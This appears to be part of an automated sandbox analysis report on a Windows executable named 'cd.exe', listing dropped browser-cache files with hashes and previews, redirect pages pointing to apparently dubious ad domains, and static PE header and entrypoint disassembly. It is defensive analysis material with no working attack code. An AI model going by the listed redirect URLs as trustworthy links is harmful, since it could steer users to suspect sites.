Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.104263951080776
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnbTDnWimI002EtM3MHdNMNxfnbTDnWimI00OVbe5EtMb:2d6NxrSZHKd6NxrSZ7Vijb
MD5:	BDC8F6FB552E18FBA0BCDA81A21E7082
SHA1:	ECB3148F93F0A95BE011235060D0F55A4FB5CA5D
SHA-256:	E8B01F4687A0C7F9122EA277E75590893B34B36413BCC35B63B23CD62D58E495
SHA-512:	98D2BE5AF7DBB05B705AF8755CE246DE9F305C962C48C0C44AC271256A9ECBC0A94F1C93D315BA8C103313ECEB947E200FC72E2DC691163C95FF9F59F40AD593
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0xc9954168,0x01d7a9bc</date><accdate>0xc9954168,0x01d7a9bc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\wlm7n14\imagestore.dat Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	5736
Entropy (8bit):	3.203464048321813
Encrypted:	false
SSDEEP:	48:dparxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222w:ci
MD5:	11D51B96EA77F30B330194110BA96BC7
SHA1:	CEA4D42916C32FC21A2C60620DE8F76A2DBC4426
SHA-256:	79FC13392629FF36B061CD9BD12D6152B300953BC272F6CEAAAA2A2B25B7A005
SHA-512:	2FE562F5713C6C01A91DFC3E3A962B1C9F8A15033DE73E39E8E9C0DC17397A07361CCDF5170842B0EDE687AD48289C4F191D07D72A08E30257ABD9FFE71C2A9E
Malicious:	false
Preview:	..h.t.t.p.s.:././.g.e.r.t.r.k...c.o.m./.f.a.v.i.c.o.n...i.c.o...........'".... .........(...'...D..... .....................................................................................................................................................................................;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X.......

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\0V71R0V5.htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	219
Entropy (8bit):	5.23823323380098
Encrypted:	false
SSDEEP:	3:IskN20EFNjJ8S/7A+KWRIJiYEUFLZxs4bSl02rBsSZ7NE7uR0Lq9DmJS4IoQ5a8G:wRkrQWR0iYBtqWt2aSyuic4ILoP
MD5:	D4B691CD9D99117B2EA34586D3E7EEB8
SHA1:	C79F5572F672361BC097676CB5DA9D4AA956C8B9
SHA-256:	2178EEDD5723A6AC22E94EC59BDCD99229C87F3623753F5E199678242F0E90DE
SHA-512:	B69C162BFBA1290C98A2CD222F6EFF9DF69CFC3DBA1651381F4068B30DA813E1687387A794E50B51058C2FDA17B217153BA9599E1E19DC567389B7083093C1FD
Malicious:	false
Preview:	<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">.<TITLE>301 Moved</TITLE></HEAD><BODY>.<H1>301 Moved</H1>.The document has moved.<A HREF="http://www.google.com/">here</A>...</BODY></HTML>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\d4a6d4bd[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines
Category:	dropped
Size (bytes):	1655
Entropy (8bit):	6.062272980018994
Encrypted:	false
SSDEEP:	48:9TQ3GC2lAeIRjHpPQWhLB0yQkcz8uhTMeD3Uenvj:pQUOXNHpPQWJB0yQjQuhAm3Ueb
MD5:	5DB7C38AA6E80C00473D801F6610B35F
SHA1:	54DAB73B9A850665843529118E72AC0A5DAA55A1
SHA-256:	CC334F770DC2A3CD8B1AC2D64E035A71DDF8855C5B68F2DE884D11C7F8EC98E6
SHA-512:	E299B27F4E09EB08C9F800D54B27548738B9D74A33EFA8A460C488268EB6249CB1F8F932147411F541CF5A3B072BA503BE74A69E2A635AF671474352ED869585
Malicious:	false
Preview:	<html><head><meta name="referrer" content="no-referrer-when-downgrade"><title>Loading</title></head>.<body><script>location.href='https://mybetterdl.com/aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\rs=AA2YrTtiIgpyWC3dfQkzVoOu4jFUo5DWgw[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	178637
Entropy (8bit):	5.493248742265343
Encrypted:	false
SSDEEP:	1536:w4zYNQN8X5XXuC2Bi03vb4yeMNzbXAkHM4yuSpAIksLKIp7zHNHwje3EMv5s+:DYNQmSuhMz4AIksPhxHwC3EM++
MD5:	7AA1AB3412E4EF309043E4EACCCC9EB4
SHA1:	A7BD66883FABD4B0CBEB2A04FB23FCEA06225351
SHA-256:	F41266FB78957B17A1D9335EF0AE32C1E153F297952E421CD3703F3FFC66F339
SHA-512:	C0D37ACF120BD28EE69019B549FB7F5EC2651013B31C38739D23D61C83C76390A9989BBEE6D7D1389463DC9B1420909FE4CF1E534340CCCE85EF7F330EEE17F3
Malicious:	false
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var pe;._.qe=function(a,b){b?a.setAttribute("role",b):a.removeAttribute("role")};_.M=function(a,b,c){Array.isArray(c)&&(c=c.join(" "));var d="aria-"+b;""===c\|\|void 0==c?(pe\|\|(pe={atomic:!1,autocomplete:"none",dropeffect:"none",haspopup:!1,live:"off",multiline:!1,multiselectable:!1,orientation:"vertical",readonly:!1,relevant:"additions text",required:!1,sort:"none",busy:!1,disabled:!1,hidden:!1,invalid:"false"}),c=pe,b in c?a.setAttribute(d,c[b]):a.removeAttribute(d)):a.setAttribute(d,c)};..}catch(e){_._DumpException(e)}.try{./.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0./.var se,te,ue;_.re=function(a,b){var c=a.length-b.length;return 0<=c&&a.indexOf(b,c)==c};se=function(a){return"string"==typeof a.className?a.className:a.getAttribute&&a.getAttribute("class")\|\|""};te=function(a){return a.classList?a.classList

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\1G7O03DV.htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	356
Entropy (8bit):	4.811709820418917
Encrypted:	false
SSDEEP:	6:qzxVkMRJWmNJax3XLxcKv8wF+B9hqecVAqV9qeSF0VqHV7bDRd7HTkIGII:kxVkMq/x3bxrX1eIVseSp1DRRQIGII
MD5:	7A7107EF5B0185F624703F0CE3161389
SHA1:	4E95838C06FBE825CD69FEAC3F28E91D6EA12D4F
SHA-256:	3750F0F41871B5F6A0669E0FAE857A2828AE2A187D8865D6E72F9929C4C00DFB
SHA-512:	D187740861254F65A115040FC5D0A3FFE9553917FC55EBD5989C6605726D749760144A4C208A89A4B655F2C48A7DAA6CFDDCA2F17C9A15F2DCF78BBA40D8EA16
Malicious:	false
Preview:	<html><head><meta http-equiv="refresh" content="5; url=http://ww9.menehleibe.com/"><title>Loading</title></head>.<body><form method="post" action="http://menehleibe.com/" target="_top" id="rf"><input type="hidden" name="ic" value="0"><input type="hidden" name="fb" value="true"/></form>.<script>document.getElementById("rf").submit()</script></body></html>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\favicon[1].ico Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 39x34, 32 bits/pixel
Category:	dropped
Size (bytes):	5638
Entropy (8bit):	3.1461120884406477
Encrypted:	false
SSDEEP:	48:fxe4e4e4e4e4e4f4f4f4f4f4f4f4fYfYfYfYfYeYeYCYCHHHH222A:fC
MD5:	DB884D3FED3F81D59E95E27707047C53
SHA1:	FD991A514B1284506BBBD229F4B067C3C7CC3CEB
SHA-256:	AAB68489204839B0F8E37065417C542695E914B959927D0E3AFD0D325E3787BC
SHA-512:	AD5FCAD5D60D89AFCE9ED1A62D05E88E71B664A53B552B428145B8CC2B8133BD8CC7439D615D26591CCC1A58EE5B29A16D4C215488ACF47ECFF0616A5F9B67ED
Malicious:	false
Preview:	......'".... .........(...'...D..... .....................................................................................................................................................................................;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L..;L..;L..;L..;L..;L..........................................X...X...X...X...X...X...........%~..%~..%~..%~..%~..%~...........;..;..;..;..;..;.....;L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\googlelogo_color_84x28dp[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 84 x 28, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1785
Entropy (8bit):	7.86894160499635
Encrypted:	false
SSDEEP:	24:YEOjo9umWXnrXeUpcvNugkko+loEDBKUrSUI3YDZVLMDLDzPhs++s4S9k/vaJvGb:YdBSUmdkkoPeVSUI3kLL0PW++smpU3St
MD5:	B434F84DE33C4672C8D883A73C67E27C
SHA1:	15AA5241692EE565028B7CAC1418F6979C061FE1
SHA-256:	E3EE16B33C7AFC3464C263A9604A39A2E5EE81ED4DD68F56AE7C82D814FAF6BE
SHA-512:	D449A4F7B1D812D6FE251C87F96AD79953391722A7635799C8B7171DCA63985BB64E8F0F991501513793FA9A1DB88F7B8DCE7D59174CFA23D66FD5EEF1D01813
Malicious:	false
Preview:	.PNG........IHDR...T..........`......IDATx..Zql.e...u...@D......0........ (2..J..5D.P...V..6..D1....BT.E.uC0.......Qdk7.."[......h{w...............{..:..j#f....b.1KR.s`.C/..0....uI^T........y.P..I.>....\.V.....2.=...y/\.M.H\|(..6..kl.\|.c....P._c..-5__..<3JT..)`b.8...J.qx..U=..Fo(...+.....)...../.D..,.IQ.....}..f.....LU.ST.n.HF[`.....n>....3.../..e..Of:...r..J.2.]bC8N..q..K...O...S.........6..........R...6.......M.)..T.?..q...d....". !.f..&!.3...D)..;.....=-%.~Piw.......g i..D...7@....hWU...m..i.q...C.K.......v..:.~.v..@.e......\|..DG.\._..OO.dyw./M....`........s.xZ.......f..n..#.q.\|..=.q>U#nmZ..,v\.......MH.j...@.6`....w..\[`j..fsI..fw............6..^X...O....r...a...z........(s...v.?.-........8?.m.nq...k.p.k...jhp.{..:d~1.eq._JN......cebo...@.%.j.A)7.q.....\|l .v.+&.qI\.o.Pf.,L....a.#%8..g6 uF.YZ%.... .?'e5.......L.Cr..J....t..EJ;....A...J.1.Q...<....8...?{.....$;...6#..Z..j.96..w..&E.:s... .....(!b..@..).;.a..v...,p.t.....5Z.zv...U.....]..[^...

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\LM1X3BMT.htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	158522
Entropy (8bit):	5.912822586462801
Encrypted:	false
SSDEEP:	1536:vosOtA0vKWzhq7gnsUP1jBUN7n3eKCQ6h0/KpG790Q/+vRWca5pv0KdcQfYWi9MT:Q8I9o37w1Qcm0KdcV+t
MD5:	7B408FDFF3226BE3BA01BB6056273800
SHA1:	DA6B2223F142BA9006418476708C5BDBE9114796
SHA-256:	D777C3C3AFF47F876E09CF5A0BF321BC6AC660EB9716FD950CF5277BE70FEE8D
SHA-512:	6961A69F76D3603B629C7C620A92B34A7269189E2F2D8ACFF83675AB3B6F0A78D5ECB1120A62CAF11D460AAB4257047DFF9D73C6C0ADB8FC162D1A3DBF4996E2
Malicious:	false
Preview:	<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><link href="/manifest?pwa=webhp" crossorigin="use-credentials" rel="manifest"><title>Google</title><script nonce="sBDQvviEJYE6GoG6F/T2Gw==">(function(){window.google={kEI:'rKtAYY2rHY25kwWZrp3YAw',kEXPI:'31',kBL:'myGb'};google.sn='webhp';google.kHL='en-GB';})();(function(){.var f=this\|\|self;var h,k=[];function l(a){for(var b;a&&(!a.getAttribute\|\|!(b=a.getAttribute("eid")));)a=a.parentNode;return b\|\|h}function m(a){for(var b=null;a&&(!a.getAttribute\|\|!(b=a.getAttribute("leid")));)a=a.parentNode;return b}.function n(a,b,c,d,g){var e="";c\|\|-1!==b.search("&ei=")\|\|(e="&ei="+l(d),-1===b.search("&lei=")&&(d=m(d))&&(e+="&lei="+d));d="";!c&&f._cshid&&-1===b.search("&cshid=")&&"slh"!==a&&(d="&cshid="+f._cshid);c=c\|\|"/"+(g\|\|"gen_204")+"?atyp=i&ct="+a+

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\rs=AA2YrTt5urjnc1-as0vV15aU6T-f2ANE9g[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	235
Entropy (8bit):	5.054129687067898
Encrypted:	false
SSDEEP:	6:EZwTcqcA2n6gt9VvKcZWbnRVIM6RoeSjIUVY/:EZfqcA26gAcZWfp6SVY/
MD5:	2B1D2EF81983F949B10A03ECE9D6B80C
SHA1:	C171F9C15235F09A1E0397A5F47DF4D712E91550
SHA-256:	B3B95456B6C2CD4D41EAEB10DC4291970EBB430F6E538A4DAF99F8369A1F7101
SHA-512:	439F8992A36C3BBD3E65318B236CA58D80FFC5DC100B3B31BF4ACD238D9021DBF46DDAB3D32670C477FC155BB1991B75D807E392923B3801B2FBBC9D02EAF1B4
Malicious:	false
Preview:	.gb_Qe{background:rgba(60,64,67,0.90);border-radius:4px;color:#ffffff;font:500 12px 'Roboto',arial,sans-serif;letter-spacing:.8px;line-height:16px;margin-top:4px;min-height:14px;padding:4px 8px;position:absolute;z-index:1000}sentinel{}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\desktop_searchbox_sprites318_hr[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 40 x 124, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	779
Entropy (8bit):	7.376883204451902
Encrypted:	false
SSDEEP:	24:36kAKAyMhGb5AHgK7+Wpf3sNQV34DVvN9sck:3vAKzVb5wuo3+1Jxk
MD5:	03E471800AFFD719388000AA2356DE1F
SHA1:	42E718342BD7F6EDF4899E161A77452DCBAC68F5
SHA-256:	BC23B3B207E8FA55B0C65A00F3FED491FA9EB5B1B39D159E7C4921BD331135EC
SHA-512:	BFA4329D35568F4F50AC2B05917AECB4AD3A4A69F8B7248E6D39CEA94F90C231B022C705ED1255F930271DB2BF5286F4B24BE6756A61E928B0D0723747D40081
Malicious:	false
Preview:	.PNG........IHDR...(...\|.....,?.....{PLTE..............................................................................................................................5...)tRNS.......`..0. p`.. ...@...p.P.._.@P0.o@P.\|:8.....IDATx.....0..a...,'....9jz...S<..#.'...O..-e....n`.X...M^.ka..r.....:...'@.WCA.G.F`[i...r.X.....,....`..2`../g.<...:.Cg@ ....M...@w.C..ix`o...8.....?..@..Z.r.@.Wf..,.......z.....~B...y~.b.je]_...p......:YR.....4W..{>.}r%.~..$..........C.B..@..;....p.......4.gg.Muo...;B4..#.....5L..F.j..F.5...\|.'x.`.O.-,-...:.....'....~.....,uj...y\|......v.....b..;......./kfm...ck'2.".....b&aru..@b.B{h.&.H.7:.)..d.W.\z...{......a.Bx_...<.?..M8C....,8.....S....T...... .Y.n].A~.j.Pt*KNe.,:.'..J.M.......Wt.#)[..w....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\googlelogo_color_272x92dp[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 544 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	13504
Entropy (8bit):	7.934568436975546
Encrypted:	false
SSDEEP:	384:gwSYjn2PH6WNa7cr7FliUuaJ78UOr0raQR:gOn2PaWNks7ziUuagJ0lR
MD5:	80FA4BCAB0351FDCCB69C66FB55DCD00
SHA1:	26F471F6EBE3B11557506F6AE96156E0A3852E5B
SHA-256:	262084257C2103702EF8A25705E3F8DBC1FA3823103AD7B954D54BDB77E6D89D
SHA-512:	B87A7554C5108400483EDAE585DAC672DEA6FE0DCD51CF5F73B4F9947649607F9C97B3B410FC0259BC2E0C60951DF2431323C1C7485A74291C23D999CFC32E17
Malicious:	false
Preview:	.PNG........IHDR... ..........#W...4.IDATx.....%?...m.}....(.Y:..n..z..m....w.$=.....^....N.g...\|.._".X.......v.....O.Z.y.v.#.........O4....oR.}Y......f._.i.[..xf.eC.nnIt...........9..?.y.n.-^..P....i..G..6\|_Z..2...e)$..ht.2a......Ebu...6....2..V6..B ..L..pS.~.....[u......`V?........Q....e........J.\|l$....Y..i..4....gW.../.....h...f....W+..N.E..e..p....+..8.....R.#..7..P..J.P.u..e.e:\...Q.H........2.O~ ..deC.8:.........z. @.G........p /......... @..gI...[I\|...:..][m..H............=..7.c.txH...H....2u....%..6.B`l:i.!.mQ$......d.o=..l.Q.y.Yw..Y$......d{=...D..5........#@Z.x......w....cO...4...i..e.....7J=..H.@C. .F.\|...Q.zz".Zi.hP..G.....Y?.dhA.I.......[........n...?CY......2.~i.......(..S.]..hI...[>."d....#..5F....Q.?/...89.<...t..../.)>..r^.....Dbc..p:.4m....U....4.;.Ft.Ft.4...:..5?<?m..!_.We._...#.0...".k)L..\|Yz.t./.. >...A..d...+..4.]...iz.H.[.x+.W..]2.&............e.L.q......H.....S....@.....j..W6.5].......}Z$f..L.Y?..p:..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\index[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	62
Entropy (8bit):	4.673133052883317
Encrypted:	false
SSDEEP:	3:nmNjJMzVJu+1v3pY1sK3uqn:GMRJVxYr3uqn
MD5:	2A54A8CB5733591ED39A9B22AD0D31EC
SHA1:	D3FD4F9D291464480866127810E89DBE410CC41B
SHA-256:	06FA9277A7F41DB91096AF3B9087516502F99EC5C62209D8F20426621EE1909F
SHA-512:	C673009AF39B5D992217E1109134281A3F48AB316E5A1F515A5A7509D8693818FA68328EFC0816BE5956BA79F87D0BB72899EC83F8E02827BF27170B5DE1D830
Malicious:	false
Preview:	<meta http-equiv="refresh" content="0;URL= http://google.com">

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.484538240999641
Encrypted:	false
SSDEEP:	3:oVXUtuCiPSdH8JOGXnEtuCiPSgun:o9UtugdHqEtugB
MD5:	FFC4B0966C043C7AC64A6D2462E63BF6
SHA1:	AADA1A11D642490C8D86635B12F8940F51AB64D4
SHA-256:	9F7112871FF782AC0CF220553CD17EB89965EE6F2BEAC59A692511A6D8718A2C
SHA-512:	523586F898A14A5731854B1BE50BA63EF7E506E81BE97AD8C5EB5B00A1F62FD1DCE6541959CEF49E7B5B7161787C2B1B31097CE552D323C7079F0F0B1257797F
Malicious:	false
Preview:	[2021/09/14 16:03:18.137] Latest deploy version: ..[2021/09/14 16:03:18.137] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF1C6E09CA4CF5EBDD.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.40677040396038333
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loSA9loSQ9lWSh1VI01iTF:kBqoIkaQbzo
MD5:	1DC22578617F1D3488CEB85FA0083C56
SHA1:	E0721DE9D8304D3BC7E550E148E247A426D0B681
SHA-256:	98B9D07C5D265759E63062020EAFB755B6FB9D5B22630810881C7DC532D94FFB
SHA-512:	67941D6A1BDFF429348115DB251445445C8BEB922759E2F28BC8E5DA8B9BF697B8F5039158C253867F1BBCCAA4FC8B2BCB7F7A517143CB6349CF5CD9F7DB1AAF
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFFAD0E470126C2D77.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	51081
Entropy (8bit):	0.40980137997176297
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+6cGPcAQTTkOngHy85yg:kBqoxKAuqR+6cGPcAQ/kOngHy85yg
MD5:	ABA48F42A2D4459A35A1B6EF13FC8BFA
SHA1:	99CF9B826ADE51440E84043F1463A1CE4AA4EAA5
SHA-256:	92324F8734EE3288E2E31FE2331EF0C7899E4556B263C4AD2016AEB81C9EAE27
SHA-512:	B95C9CE22677F1C302B885F943A2DFFB738441D1F794E84E6355C5A44E9B748A3645344FE5950C5487D0959E10E6DF05B753A523D80614E52AA41A796F719E0A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.362341936277573
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	cd.exe
File size:	3922432
MD5:	cd02e745a08dd29cb6fda1761b2f4b6e
SHA1:	1a0dd3348bb0f856fff51f7e22364b0974fa1ad3
SHA256:	a4ff2e7dd35e8f7362739c3a578563458548ed5ffb30abe5ec6bf6f2c0de8eb7
SHA512:	f6c55fbb6ebf25f046f6d562d1c17d4503f8244f367f1dd64270ff8a9be56b6ed9c92dedd111359fa91d5ed8650773310f609c447baa0b1b4a9ee486143b2ca4
SSDEEP:	24576:BuuP1xP+9mrnv/6dh3Qh3OXuaq4gTeEu8Ct+M3VUXeN5DB:BtPHG6dZ4gTq8u+1Xq
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@L..!"^.!"^.!"^.s.^.!"^.s.^.!"^.s.^.!"^.Y.^.!"^.!#^.!"^.Y.^.!"^.s.^.!"^.Y.^.!"^Rich.!"^........................PE..L.G.2..T...

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4036f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE, NX_COMPAT
Time Stamp:	0x54941332 [Fri Dec 19 11:59:46 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	ebc536e497c338b5abee5455de5bead2

Entrypoint Preview

Instruction
call 00007F44F8AE2DE7h
jmp 00007F44F8ADFF65h
push 00000014h
push 0042E750h
call 00007F44F8AE1498h
call 00007F44F8AE2FB8h
movzx esi, ax
push 00000002h
call 00007F44F8AE2D7Ah
pop ecx
mov eax, 00005A4Dh
cmp word ptr [00400000h], ax
je 00007F44F8ADFF66h
xor ebx, ebx
jmp 00007F44F8ADFF95h
mov eax, dword ptr [0040003Ch]
cmp dword ptr [eax+00400000h], 00004550h
jne 00007F44F8ADFF4Dh
mov ecx, 0000010Bh
cmp word ptr [eax+00400018h], cx
jne 00007F44F8ADFF3Fh
xor ebx, ebx
cmp dword ptr [eax+00400074h], 0Eh
jbe 00007F44F8ADFF6Bh
cmp dword ptr [eax+004000E8h], ebx
setne bl
mov dword ptr [ebp-1Ch], ebx
call 00007F44F8AE2539h
test eax, eax
jne 00007F44F8ADFF6Ah
push 0000001Ch
call 00007F44F8AE0041h
pop ecx
call 00007F44F8AE2495h
test eax, eax
jne 00007F44F8ADFF6Ah
push 00000010h
call 00007F44F8AE0030h
pop ecx
call 00007F44F8AE2DF3h
and dword ptr [ebp-04h], 00000000h
call 00007F44F8AE2523h
test eax, eax
jns 00007F44F8ADFF6Ah
push 0000001Bh
call 00007F44F8AE0016h
pop ecx
call dword ptr [0042602Ch]
mov dword ptr [0043DFFCh], eax
call 00007F44F8AE2E0Eh
mov dword ptr [00434708h], eax
call 00007F44F8AE27B1h
test eax, eax
jns 00007F44F8ADFF6Ah

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[LNK] VS2013 UPD3 build 30723
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ebb0	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3e000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x26150	0x38	.rdata
